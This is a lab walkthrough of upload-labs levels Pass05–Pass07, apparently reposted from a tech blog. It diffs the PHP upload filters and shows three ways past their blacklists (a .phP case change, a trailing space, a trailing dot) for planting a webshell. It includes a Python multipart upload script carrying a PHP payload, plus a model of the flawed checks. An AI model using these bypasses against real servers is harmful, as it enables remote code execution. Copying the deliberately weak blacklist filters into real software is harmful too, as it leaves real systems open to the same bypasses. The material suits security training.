- Pass05
Clearly this level is once again a step up from the previous one, but a diff of the two sources shows that something has actually been taken away this time:
Pass04:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); // convert to lowercase
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = 'This file type is not allowed!';
}
} else {
$msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
}
}
Pass05:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name); // strip trailing dots from the filename
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
$file_ext = trim($file_ext); // trim leading/trailing whitespace
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = 'This file type is not allowed';
}
} else {
$msg = $UPLOAD_ADDR . ' folder does not exist, please create it manually!';
}
}
The audit shows that Pass05 dropped the convert-to-lowercase step (while adding .htaccess to the blacklist), so a case bypass works: rename the webshell's extension to .phP and upload it. in_array() compares strings case-sensitively, and the hand-picked variants in the list (.pHp, .Html, ...) do not include .phP, so the check passes. One caveat a tester should keep in mind: whether the stored .phP file actually executes depends on how the web server maps extensions to the PHP handler. Apache's mod_mime compares AddType/AddHandler extensions case-insensitively, whereas a <FilesMatch "\.php$"> SetHandler rule is case-sensitive unless it is written with (?i). The proper fix is to lowercase before comparing, or better, to replace the blacklist with an allowlist.


- Pass06
The hint makes it clear that this level belongs to the same series as Pass05, but this level fixes the case bypass from the previous one, so another approach is needed:
$file_ext = strtolower($file_ext); // convert to lowercase
A quick comparison shows that the previous level's trim of the extension is gone here, so this is evidently the flaw the level wants us to use:
$file_ext = trim($file_ext); // trim leading/trailing whitespace
Concretely: upload the webshell, intercept the request in Burp Suite, and change the extension .php to ".php " (append a space after the extension). The file is then uploaded and executes.



Why it works: the target is hosted on Windows, where the filesystem API strips trailing spaces (and trailing dots) from a filename when the file is created. The uploaded name ends in ".php ", which the filter no longer trims and which is not in the blacklist, so the check passes; Windows then stores the file as .php and the server executes it. Note that because Windows strips the trailing space, the file cannot be renamed locally in advance; the extension has to be changed in the intercepted request. On a Linux host the trailing space would be kept in the stored filename and the file would not be handled as PHP at all.
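The Burp step above amounts to sending a multipart/form-data body whose filename is not touched by the local filesystem. The following is an added example written for this walkthrough, not upload-labs code: it builds the body by hand so the trailing-space filename reaches the server byte-for-byte, then posts it with urllib. The field names upload_file and submit come from the lab source quoted above; the target URL, the submit value and the payload are placeholders, and the filename is assumed to contain no double quote or CR/LF.

```python
"""Hand-built multipart upload that preserves the exact filename.

Added example for the Pass06 walkthrough (not part of upload-labs).
Assumptions: form field "upload_file" and POST field "submit" (taken from the
lab source); URL, submit value and payload are placeholders.
"""
import urllib.request
import uuid


def build_multipart(filename, content, fields=None, file_field="upload_file",
                    content_type="image/jpeg", boundary=None):
    """Return (Content-Type header value, body bytes).

    The filename is written into the Content-Disposition header exactly as
    given.  Nothing here touches the local filesystem, so Windows never gets
    a chance to strip trailing spaces or dots from it.  The filename is
    assumed to contain no '"' or CR/LF (a browser would percent-encode them).
    """
    boundary = boundary or uuid.uuid4().hex
    # The lab only checks isset($_POST['submit']); the value is irrelevant.
    fields = fields if fields is not None else {"submit": "upload"}
    parts = []
    for name, value in fields.items():
        parts.append((f"--{boundary}\r\n"
                      f'Content-Disposition: form-data; name="{name}"\r\n'
                      f"\r\n{value}\r\n").encode())
    parts.append((f"--{boundary}\r\n"
                  f'Content-Disposition: form-data; name="{file_field}"; '
                  f'filename="{filename}"\r\n'
                  f"Content-Type: {content_type}\r\n\r\n").encode())
    parts.append(content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def upload(url, filename, content):
    """POST the crafted body; return (HTTP status, response text)."""
    ctype, body = build_multipart(filename, content)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Constructed payload: a minimal PHP probe, sent with the Pass06 trailing-space name.
    payload = b"<?php phpinfo(); ?>"
    ctype, body = build_multipart("shell.php ", payload)
    print(ctype)
    print(body.decode())
    # Live step against a lab instance (placeholder URL, uncomment to run):
    # print(upload("http://127.0.0.1/upload-labs/Pass-06/index.php", "shell.php ", payload))
```

The same builder covers the Pass07 variant by passing "shell.php." as the filename; only the Content-Disposition line changes.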
- Pass07
Much the same idea as Pass06. The difference is that the trim from Pass05 is back in this level (the lowercase conversion is kept as well):
$file_ext = trim($file_ext); // trim leading/trailing whitespace
But the step that stripped trailing dots from the filename has disappeared, so this is clearly the flaw to exploit here:
$file_name = deldot($file_name); // strip trailing dots from the filename
So take the same file and the same procedure as the previous level, but append a dot instead of a space (shell.php.). strrchr() then returns "." as the extension, which is not in the blacklist, and Windows drops the trailing dot when it stores the file, so the level falls straight away.
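To see exactly why each of the three filenames (.phP, "php " with a trailing space, "php." with a trailing dot) slips past exactly one of Pass05, Pass06 and Pass07, the following added example models the three extension checks in Python together with the Windows filename normalization the Pass06 and Pass07 tricks rely on. It is not upload-labs code. The PHP functions are re-implemented with their documented semantics (trim() strips " \t\n\r\0\x0B", deldot() strips trailing dots, strrchr() returns the suffix from the last '.', str_ireplace() is a case-insensitive replace); the Pass05 blacklist is copied from the source above. Pass06 is modelled as the page describes it, with no trim at all, and the Pass07 pipeline is assumed to be Pass05's with strtolower added and deldot removed, as the text states.

```python
"""Model of the Pass05/06/07 extension checks plus Windows name normalization.

Added example for this walkthrough, not upload-labs code.  PHP semantics
re-implemented; Pass06 assumed to have no trim() anywhere, Pass07 assumed to
be Pass05 + strtolower() - deldot(), as the text describes.
"""
import re

# Pass05 blacklist copied from the lab source (mixed-case entries kept on
# purpose: in_array() compares case-sensitively, so only these exact spellings
# are rejected).
DENY_EXT = frozenset([
    ".php", ".php5", ".php4", ".php3", ".php2", ".html", ".htm", ".phtml",
    ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".Html", ".Htm", ".pHtml",
    ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx",
    ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax",
    ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx",
    ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".htaccess",
])

PHP_TRIM_CHARS = " \t\n\r\0\x0b"   # default character set of PHP trim()


def php_trim(s):
    return s.strip(PHP_TRIM_CHARS)


def deldot(s):
    """upload-labs deldot(): remove trailing dots only."""
    return s.rstrip(".")


def strrchr_dot(s):
    """PHP strrchr($s, '.'): suffix from the last '.'; '' when there is none."""
    i = s.rfind(".")
    return s[i:] if i != -1 else ""


def strip_data(s):
    """PHP str_ireplace('::$DATA', '', $s)."""
    return re.sub(r"::\$DATA", "", s, flags=re.IGNORECASE)


def pass05_ext(name):
    # trim -> deldot -> strrchr -> str_ireplace -> trim   (no strtolower)
    n = deldot(php_trim(name))
    return php_trim(strip_data(strrchr_dot(n)))


def pass06_ext(name):
    # deldot -> strrchr -> strtolower -> str_ireplace   (no trim at all)
    return strip_data(strrchr_dot(deldot(name)).lower())


def pass07_ext(name):
    # trim -> strrchr -> strtolower -> str_ireplace -> trim   (no deldot)
    return php_trim(strip_data(strrchr_dot(php_trim(name)).lower()))


LEVELS = {"Pass05": pass05_ext, "Pass06": pass06_ext, "Pass07": pass07_ext}


def accepted(level, name):
    """True when the level's blacklist check lets this filename through."""
    return LEVELS[level](name) not in DENY_EXT


def windows_saved_name(name):
    """Simulates Win32 path normalization: trailing spaces and dots are dropped
    when the file is created, so 'shell.php ' and 'shell.php.' land as 'shell.php'."""
    return name.rstrip(" .")


def bypasses(name):
    """Levels that accept the name AND leave a .php file on a Windows host.
    (.phP counts here; whether it runs depends on the server's handler mapping.)"""
    return [lvl for lvl in LEVELS
            if accepted(lvl, name) and windows_saved_name(name).lower().endswith(".php")]


if __name__ == "__main__":
    for candidate in ["shell.php", "shell.phP", "shell.php ", "shell.php.", "shell.php::$DATA"]:
        print(repr(candidate), "->", bypasses(candidate) or "blocked everywhere")
```

Running the module prints which level each candidate defeats; the point to take away is that every one of the three levels has a different normalization gap, and that the filesystem, not PHP, performs the final rename.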

Please credit the source when reposting. Original link: https://www.uj5u.com/qita/289174.html
